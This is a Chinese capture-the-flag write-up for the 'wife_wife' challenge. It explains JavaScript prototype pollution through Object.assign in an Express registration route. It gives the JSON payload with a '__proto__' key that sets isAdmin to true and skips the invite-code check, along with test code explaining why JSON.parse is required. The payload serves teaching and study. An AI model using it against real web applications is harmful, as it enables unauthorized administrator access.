【攻防世界】wife_wife

原型链污染

源码

python 复制代码
app.post('/register', (req, res) => {
    let user = JSON.parse(req.body)
    if (!user.username || !user.password) {
        return res.json({ msg: 'empty username or password', err: true })
    }
    if (users.filter(u => u.username == user.username).length) {
        return res.json({ msg: 'username already exists', err: true })
    }
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }
    let newUser = Object.assign({}, baseUser, user)
    users.push(newUser)
    res.json({ msg: 'user created successfully', err: false })
})

let newUser = Object.assign({}, baseUser, user)的作用把baseUser和user的属性合并后拷贝到{}中,即newUser是baseUser和user的集合体。baseUser猜测是user类似父类的东西,user应该就是上面的{"username":"b","password":"b","isAdmin":false}部分了 。

Object.assign 这个方法是可以触发原型链污染的,然后污染 __proto__.isAdmin 为 true 就可以了。在注册页面,构造payload

原型链污染不太准确的理解就是"父类影响子类",一个子类继承于父类后,父类有什么属性子类就有什么属性。比如这里我们的注册信息data按照json的形式传入,JSON.parse后得到一个对象。这个对象有3个键名,username,password和__proto__。比较容易搞混的地方来了,这个__proto__是键名,单纯是个键名,值为{"isAdmin":true},而不是类的原型对象prototype。这点很重要,如果我们把测试代码稍微修改一下:

php 复制代码
let baseUser={};
//let data='{"username":"e","password":"e","__proto__":{"isAdmin":true}}';
//let user= JSON.parse(data);
let user={"username":"e","password":"e","__proto__":{"isAdmin":true}};
console.log(user);
console.log(user.isAdmin); //输出true,导致进入下面的if语句将isAdmin强行改为false
let INVITE_CODE="whatever";
if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
}
let newUser = Object.assign({}, baseUser, user) //那这里的原型链污染也没用了,子类后定义的属性值会覆盖父类的
console.log(newUser.isAdmin);

console.log(user.isAdmin);尝试读取isAdmin属性时会顺着上去找父类的,得到true,进入if语句赋值就没用了。总之就是记住,原型链污染需要在JSON解析的情况下进行

wife_wife ctf-CSDN博客

相关推荐
Devil枫10 分钟前
Vue 3 单元测试与E2E测试
前端·vue.js·单元测试
Yaml438 分钟前
Spring Boot 与 Vue 共筑二手书籍交易卓越平台
java·spring boot·后端·mysql·spring·vue·二手书籍
小小小妮子~40 分钟前
Spring Boot详解:从入门到精通
java·spring boot·后端
hong16168842 分钟前
Spring Boot中实现多数据源连接和切换的方案
java·spring boot·后端
尚梦44 分钟前
uni-app 封装刘海状态栏(适用小程序, h5, 头条小程序)
前端·小程序·uni-app
aloha_7891 小时前
从零记录搭建一个干净的mybatis环境
java·笔记·spring·spring cloud·maven·mybatis·springboot
GIS程序媛—椰子1 小时前
【Vue 全家桶】6、vue-router 路由(更新中)
前端·vue.js
记录成长java2 小时前
ServletContext,Cookie,HttpSession的使用
java·开发语言·servlet
前端青山2 小时前
Node.js-增强 API 安全性和性能优化
开发语言·前端·javascript·性能优化·前端框架·node.js
睡觉谁叫~~~2 小时前
一文解秘Rust如何与Java互操作
java·开发语言·后端·rust